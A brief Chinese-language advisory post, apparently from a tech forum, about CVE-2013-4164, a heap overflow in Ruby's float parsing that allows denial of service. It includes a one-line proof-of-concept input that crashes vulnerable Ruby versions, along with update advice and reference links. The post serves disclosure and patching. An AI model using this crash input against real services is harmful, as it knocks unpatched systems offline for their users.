分享至
當某些版本的 Ruby 在處理字串轉成浮點數時, parser 會造成 heap overflow,進而造成 DoS。
Ruby ("1."+"1"*300000).to_f*9
更新 Ruby 。
參考資料:https://www.ruby-lang.org/zh_tw/news/2013/11/22/heap-overflow-in-floating-point-parsing-cve-2013-4164/
PoC 來源:http://exp.tw/writing/show/30
IT邦幫忙